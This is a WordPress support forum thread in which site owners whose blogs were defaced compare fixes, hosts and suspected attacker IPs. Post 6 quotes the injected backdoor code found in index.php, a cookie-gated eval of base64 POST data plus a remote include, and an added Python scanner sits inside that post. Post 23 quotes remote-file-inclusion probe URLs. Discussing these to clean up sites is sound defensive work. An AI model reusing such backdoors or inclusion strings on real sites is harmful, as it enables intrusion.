
HACKED twice in one week ver 2.7 (25 posts)

  1. freeon
    Member
    Posted 5 years ago #

    My sites are being hacked like wildfire. I am madder than a hornet. WordPress ver 2.7
    They change the theme index.php to display a pic of a cobra with the Assassin Hackers moniker.
    FIX
    Upload your original theme that you are using index.php to fix the site.
    They also delete the admin user #1 from the mysql database.
    Use phpmyadmin in your cpanel to access your database.
    Select your database on the left sidebar
    Find wp_users and select browse
    Note that user 1 is missing...that's what the hacker deleted
    My easy fix is to take another id 2 or 3 etc. and click edit
    Change id value to 1
    Change user_login value to your username
    user_pass row set function to MD5 and value to your password
    Change user_name value to your username
    Click Go

    You are now a little less frustrated because you can now log into your admin panel but are ticked off that your site has been hacked twice in the last week. Your hosting provider cannot stop the attacks and tells you to upgrade to the latest version of WordPress, which you are already running.

    These are who the hackers were:

    Rafah, Palestinian Territory
    Palestine Telecommunications Company (paltel) (213.6.180.183)

    Riyadh, Ar Riyad, Saudi Arabia
    Nesma (89.4.242.73)

    Hosting co banned their IPs but said all they need to do is reset their modems and they are back in again with new IPs.

  2. Mark
    Member
    Posted 5 years ago #

    I've fixed many hacks like this in the past few months alone. Do your site 3 favors:

    1. Create a new administrator user (so that it doesn't have ID 1 in the database) then delete any other administrator accounts that you don't need. And since you've already set your password using MD5 go reset it to something new (using the reset password feature of WordPress) so that it will use the encryption 'salt' built into more recent WP versions, otherwise your MD5 passwords are subject to dictionary attacks and rainbow table attacks...

    2. Remove write permissions from all of your theme files. You will no longer be able to edit your theme files using the WP theme editor but that's a small price to pay.

    3. Sign up to get the soon-to-be-released beta of Maximum Security for WordPress. Ya, that's a shameless plug... I hope it helps you though.

    Finally, don't believe for one second that you've really identified the bad guys responsible for messing with your sites. It's extremely easy to cover one's tracks on the Internet and make it look as though someone else is responsible for whatever activity. "False flag" operations are incredibly common. Most bad guys already know how to do that and do it as a matter of habit. To really track down a bad guy typically requires the cooperation of many ISPs across the world - although once in a while a bad guy turns out to be a complete idiot that is all too easy to find. That's rather rare.

  3. freeon
    Member
    Posted 5 years ago #

    Wpsec, thanks for the additional info...well received. Additionally I found the forum where the hackers hang out, trade their hacking software and boast about their so-called defacements. http://arabic-m.com/index.php?page=mirror&id=18268 It might be a good idea for security to reverse engineer their hacking software to prevent future attacks. Little children must play cat and mouse.

  4. mgarabed
    Member
    Posted 5 years ago #

    Freeon, my WordPress sites and one non-WordPress site were also hacked into by the same assassin hackers on Friday night/Saturday morning (multiple sites, but one hosting account). Seems like a defacement only. Have you done anything further to secure your setup? Also, I am using HostGator, and I don't know if it has anything to do with them or not. I changed the index.html pages. Rather annoying..

  5. freeon
    Member
    Posted 5 years ago #

    I'm using HostGator too. I have done what wpsec has suggested. So far so good. They hacked multiple WP sites of mine. Easy enough to fix...just a waste of time. In the real world I have to deal with idiots tagging my garage with graffiti. In cyberspace it's children hacking. Pull yourself up by your bootstraps and keep on walking...lol. I make money on the internet...hackers waste their lives on the internet! At the end of the day I win.

  6. sunny51
    Member
    Posted 5 years ago #

    Hi,

    We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can't log in to your blog and are sent into a loop (no error message either).

    Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.

    The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can't tell which files were changed and we must assume everything is compromised.

    The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. This is index.php:

    <?php
    // Injected backdoor: if the attacker's cookie hashes to the expected value,
    // execute whatever PHP is base64-encoded in $_POST['file'] and stop.
    if(md5($_COOKIE['c9a8b336f8ead0e0'])=="5dfa4a678793aeaee3d9394d72d12147"){ eval(base64_decode($_POST['file'])); exit; } ?>
    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    // Also injected: with ?license= in the URL, a remote file is included
    // instead of the normal WordPress bootstrap.
    if (isset($_GET['license'])) {
    	@include('http://wordpress.net.in/license.txt');
    } else {
    	require('./wp-blog-header.php');
    }
    ?>

    We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely.

    I am worried that there is a 2.7 vulnerability that is easily exploitable; if anyone has any ideas please let me know...

    THANKS :)
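    As an added example (not code from this thread or from WordPress), here are the two checks that Mark's step 2 and sunny51's injected index.php above call for, in Python: a scanner for the three injected constructs quoted above (cookie-gated eval of a base64 POST body, md5-checked cookie, include over http) and a function that strips write bits from theme files, run over a constructed sample tree in a temp directory. The sample file contents and the cookie hash placeholder are constructed; the include URL is the one quoted above.

```python
import os
import re
import tempfile

SUSPICIOUS = {  # patterns taken from the injected index.php quoted in this thread (case-insensitive)
    "eval of base64 POST body": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST", re.I),
    "md5-checked cookie gate": re.compile(r"md5\s*\(\s*\$_COOKIE\s*\[", re.I),
    "include over http": re.compile(r"@?(?:include|require)(?:_once)?\s*\(\s*['\"]https?://", re.I),
}

def scan_php(root):
    """Return (relative path, line number, label) for every PHP line matching a pattern."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    hits += [(os.path.relpath(path, root), lineno, label)
                             for label, pat in SUSPICIOUS.items() if pat.search(line)]
    return hits

def writable_theme_files(root):
    """Theme files with any write bit set (owner, group or world); step 2 above clears them."""
    themes = os.path.join(root, "wp-content", "themes")
    return sorted(os.path.relpath(os.path.join(d, f), root) for d, _, files in os.walk(themes)
                  for f in files if os.stat(os.path.join(d, f)).st_mode & 0o222)

def harden_theme_files(root):
    """Drop every write bit on theme files; the WP theme editor can then no longer save to them."""
    for path in (os.path.join(root, rel) for rel in writable_theme_files(root)):
        os.chmod(path, os.stat(path).st_mode & 0o555)

def build_sample(root):
    """Constructed sample tree: the backdoor lines quoted above plus one writable theme file."""
    theme = os.path.join(root, "wp-content", "themes", "default")
    os.makedirs(theme)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php if(md5($_COOKIE['c9a8b336f8ead0e0'])==\"<hash>\"){ eval(base64_decode($_POST['file'])); exit; } ?>\n"
                 "<?php if (isset($_GET['license'])) { @include('http://wordpress.net.in/license.txt'); } ?>\n")
    with open(os.path.join(theme, "index.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n")
    os.chmod(os.path.join(theme, "index.php"), 0o664)

def run_demo():
    """Build the sample, scan it, harden it and re-check; returns (hits, writable_before, writable_after)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        hits, before = scan_php(root), writable_theme_files(root)
        harden_theme_files(root)
        return hits, before, writable_theme_files(root)
```

    Point scan_php and writable_theme_files at a real document root to use them on a live install; a file whose only hit is a remote include still deserves a look, since the legitimate bootstrap never includes over http.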

  7. sunny51
    Member
    Posted 5 years ago #

    UPDATE:
    Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments.

    todo.cache was found in a plugin directory named "Get Recent Comments".
    The "picture" file was found in the Uploads folder, where normal pictures reside...

    We are tightening security on the blogs and will update when complete

  8. kjodies
    Member
    Posted 5 years ago #

    sunny51: Every single file on your server has changed and now you think you can prove that "Get Recent Comments" contains malicious code? Maybe it does on your server, but of course it does not in its original state, when you downloaded it from http://wordpress.org/extend/plugins/get-recent-comments/.

  9. Samuel B
    moderator
    Posted 5 years ago #

    I think you folks with HostGator have a serious problem. This is the 3rd thread I've seen with hacked blogs and them as host - I would be asking them what the...?

  10. whooami
    Member
    Posted 5 years ago #

    you noticed that too, sam ... :P

  11. Samuel B
    moderator
    Posted 5 years ago #

    yea - folks need to realize on shared servers that 90% of hacks come from someone having crappy security on their site or the host themselves has crappy security.
    Then there's the 10% who think upgrades are a pain and put them off.
    :>)

  12. silvalex
    Member
    Posted 5 years ago #

    Does anyone have a more secure host they would recommend that is cost effective?

  13. whooami
    Member
    Posted 5 years ago #

  14. roxyghost
    Member
    Posted 5 years ago #

    I'm hosted on Heart Internet and got hacked just over a week ago (2.7). They used the forgot password functionality somehow to change the password and then used the theme editor to upload their files. Think it was just a defacement but since I was away last week I have yet to go through everything and restore it to normality.

    The odd thing was, I checked my stats and they found my blog by searching MSN search for the IP of the heart server and the word "wordpress".

    Would appreciate some thoughts on this!

  15. jean01
    Member
    Posted 5 years ago #

    I am hosted on HostGator and I have not been hacked.

    I use many of the hints at Hardening WordPress; maybe that's why.

    I have 4 blogs at HostGator on 4 different domains and none of them has been hacked.

    I also have a complete FTP backup of my installation and have automated database backups emailed to me.

    Hope that this helps.

    jean
    ps
    watch me get hacked tomorrow now that I have posted this (fingers crossed)

  16. sairah
    Member
    Posted 5 years ago #

    I'm having the same problem (it's just a defacement though, although so annoying, particularly since I'm not savvy to the level that I know how to fix it!). I run on Host Department...their service has not been the best, to be honest, but they give a lot of space and so I've stuck with them...

    But honestly, I get this fugly thing as my homepage:

    http://www.sairah.endless-time.net

    If anyone has ANY idea how to deal with this, please let me know, I'm at a loss ='(

  17. chaoskaizer
    Member
    Posted 5 years ago #

    Hi sairah,
    Seems like you are on a bad hosting network. The best approach is to contact your host & send them this link AS6939 (HURRICANE) (you are within the same network). Ask them to fix that mess because your domain is already inside the safebrowsing network list. You might get banned from major search engines if they don't do anything.

  18. sairah
    Member
    Posted 5 years ago #

    Oh no! I don't want that to happen! Thanks so much for posting this! I'll definitely try to look into it, even though I've removed the defacement. Would it still happen if I've removed the defacement? O.o

  19. davespeaking
    Member
    Posted 5 years ago #

    I got hit by this hacker today.

    I'm running WordPress 2.7 with the Thesis 1.4.2 theme.

    As described above, the hacker changed the homepage and altered the ADMIN user password. He also deleted my other user accounts.

    I fixed the problem by following the directions provided by freeon (Thank you!). I went into phpMyAdmin and changed my admin password and reinstalled the Thesis Theme.

    A true pain in the ass, but not a catastrophe thanks to this invaluable forum.

    Dave

    Keywords : Saudi Arabia, qahtan-sniper, hacked, cobra

  20. elizabethrichardson
    Member
    Posted 4 years ago #

    My entire hosting account consisting of around 22 websites (sub domains were not affected) was hit by the Palestine Telecommunications Company (paltel) (213.6.76.87) hacker over the weekend.

    20 were running WordPress 2.8.4 or 2.8.5 and 2 were created with FrontPage, and my web host manager password needed to be reset so I could get access to overwrite index.php.

    I'm really confused about how to clear any other potential problems created by this hacker and all I've done so far is change passwords. Any other solutions would be greatly appreciated.

    All websites involved were hosted with Lonex Resellers.

  21. http://codex.wordpress.org/FAQ_My_site_was_hacked

    Admittedly, it sounds like your host sucks, to allow that level of hacking on the server level. My last concern would be WP (my first would be 'How soon can I cancel my contract and MOVE?!')

  22. davewhittle
    Member
    Posted 4 years ago #

    I've also been hacked by QahTaN-SniPer, but on a GoDaddy shared account. All 3 sites hacked were on the same shared Linux hosting account with GoDaddy, so I don't think it's only HostGator with the problem, although at least one of the hacked domains was once on HostGator. GoDaddy is investigating now, but I'd sure like to know if this is a problem with shared hosting in general, GoDaddy/HostGator in particular, WordPress, or what - so I'll know what I need to do with any other accounts I have.

    Any information would be appreciated.

    Thanks,
    Dave

  23. elizabethrichardson
    Member
    Posted 4 years ago #

    My websites were hacked over the weekend as stated in a previous post.

    I've been watching the influx of traffic from various hacking forums that obviously list the details of websites hit in the last batch of attacks.

    What I am noticing now is strange activity entering a server document command etc sent to a txt file on another url containing php code.

    Can someone suggest what is happening and if this is how access is gained...???

    http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?

    http://south-gippsland.netaction=logout&siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??

  24. blogger tools
    Member
    Posted 4 years ago #

    HaCKed By North Storm TeaM ~:)

    StorM the palestinian HaCkeR Was Here << !! ~~

    same as described above. theme's index.php was changed, admin password and email changed. I had Bad Behavior installed, didn't stop them. using scalahosting reseller hosting. will remove write permissions and will create an IP restriction for wp-admin.

  25. asaveri
    Member
    Posted 4 years ago #

    My site was hacked by Palestinian Hacker. I'm on GoDaddy. I can't use my WordPress username and password to get into my wordpress account to do any admin. My GoDaddy email is OK. So do I fix this through GoDaddy? I am a newbie blogger so this is a real bummer and upsetting. What do I do? I've read the posts here about fixes and it sounds daunting. Frankly I don't know where to start. I will contact GoDaddy but I need to be able to fix the WordPress blog. Any suggestions?
    Many thanks.

Topic Closed

This topic has been closed to new replies.
